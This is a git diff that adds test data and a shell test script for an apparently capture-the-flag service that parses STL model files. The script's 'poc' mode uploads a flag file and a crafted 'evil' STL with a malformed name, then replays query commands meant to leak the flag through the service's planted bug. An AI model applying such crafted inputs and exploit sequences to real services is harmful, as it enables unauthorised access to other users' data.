refactored service structure and added do.sh for automation

5 files changed, 160 insertions, 0 deletions

diff --git a/service/tests/data/evil1.stl b/service/tests/data/evil1.stl
new file mode 100644
index 0000000..706e9e2
--- /dev/null
+++ b/service/tests/data/evil1.stl
@@ -0,0 +1,9 @@
+solid test˙
+facet normal 0 0 1.0
+		outer loop
+			vertex 1 0 0
+			vertex 1 1 0
+			vertex 0 1 0
+		endloop
+	endfacet
+endsolid
diff --git a/service/tests/data/flag1.stl b/service/tests/data/flag1.stl
new file mode 100644
index 0000000..f2a3854
--- /dev/null
+++ b/service/tests/data/flag1.stl
@@ -0,0 +1,16 @@
+solid ENO{TESTFLAG}
+	facet normal 1.0 0 0
+		outer loop
+			vertex 0 1 0
+			vertex 0 1 1
+			vertex 0 0 1
+		endloop
+	endfacet
+	facet normal 0 0 1.0
+		outer loop
+			vertex 1 0 0
+			vertex 1 1 0
+			vertex 0 1 0
+		endloop
+	endfacet
+endsolid
diff --git a/service/tests/data/sample-ascii.stl b/service/tests/data/sample-ascii.stl
new file mode 100644
index 0000000..e3c89ef
--- /dev/null
+++ b/service/tests/data/sample-ascii.stl
@@ -0,0 +1,16 @@
+solid test
+	facet normal 1.0 0 0
+		outer loop
+			vertex 0 1 0
+			vertex 0 1 1
+			vertex 0 0 1
+		endloop
+	endfacet
+	facet normal 0 0 1.0
+		outer loop
+			vertex 1 0 0
+			vertex 1 1 0
+			vertex 0 1 0
+		endloop
+	endfacet
+endsolid test
diff --git a/service/tests/data/sample-binary.stl b/service/tests/data/sample-binary.stl
new file mode 100644
index 0000000..13c02e4
--- /dev/null
+++ b/service/tests/data/sample-binary.stl
diff --git a/service/tests/test.sh b/service/tests/test.sh
new file mode 100644
index 0000000..69e3ea1
--- /dev/null
+++ b/service/tests/test.sh
@@ -0,0 +1,119 @@
+#!/bin/sh
+
+set -e
+
+# RUNTYPE=1
+
+SCRIPTPATH="$(dirname $(readlink -f "$0"))"
+cd "$SCRIPTPATH"
+
+export RESULTDIR="../data/scans"
+export ECHO_INPUT=1
+
+announce() {
+	count=$(echo "$1" | wc -c)
+	python3 -c "
+import math
+s = '$1'
+c = 80
+print()
+print('#'*c)
+print('#' + ' '*math.floor((c - len(s))/2-1) + s + ' '*math.ceil((c - len(s))/2-1) + '#')
+print('#'*c)
+print()
+	"
+}
+
+checkleaks() {
+	valgrind --leak-check=full ./stldoctor 2>&1 | tee /tmp/testlog
+	if [ -z "$(grep "no leaks are possible" /tmp/testlog)" ]; then
+		echo "Valgrind exited with errors!"
+		exit 1
+	fi
+}
+
+connect() {
+	if [ "$RUNTYPE" == "remote" ]; then
+		nc localhost 9000
+	elif [ "$RUNTYPE" == "debug" ]; then
+		checkleaks
+	else
+		./stldoctor
+	fi
+}
+
+if [ "$1" == "stl" ]; then
+
+	announce "Testing ASCII STL Parsing"
+	(
+		echo "echo"
+		echo "submit"
+		cat tests/sample-ascii.stl | wc -c
+		cat tests/sample-ascii.stl
+		echo "ASCII-testname"
+	) | checkleaks
+
+	announce "Testing BIN STL Parsing"
+	(
+		echo "echo"
+		echo "submit"
+		cat tests/sample-binary.stl | wc -c
+		cat tests/sample-binary.stl
+		echo "BIN-testname"
+	) | checkleaks
+
+elif [ "$1" == "poc" ]; then
+
+	announce "Testing Proof-Of-Concept"
+
+	[ ! -z "$RESULTDIR" ] && rm -rf "$RESULTDIR"/*
+
+	echo -e "\n--- Uploading target STL ---\n" 1>&2
+	(
+		echo "echo"
+		echo "submit"
+		cat tests/flag1.stl | wc -c
+		cat tests/flag1.stl
+		echo "N0TaFL4G"
+		echo "exit"
+	) | connect
+
+	echo -e "\n--- Uploading evil STL ---\n" 1>&2
+	(
+		echo "echo"
+		echo "submit"
+		cat tests/evil1.stl | wc -c
+		cat tests/evil1.stl
+		echo "EV1L"
+		echo "exit"
+	) | connect
+
+	echo -e "\n--- Testing Exploit ---\n" 1>&2
+	(
+		echo "echo"
+
+		# try index 0
+		echo "query"
+		echo "EV1L"
+		echo "0"
+		echo "n"
+
+		echo "query last"
+		echo "0"
+		echo "n"
+
+		# try index 1
+		echo "query"
+		echo -e "EV1L"
+		echo "0"
+		echo "n"
+
+		echo "query last"
+		echo "1"
+		echo "n"
+		echo "exit"
+	) | connect
+
+else
+	connect
+fi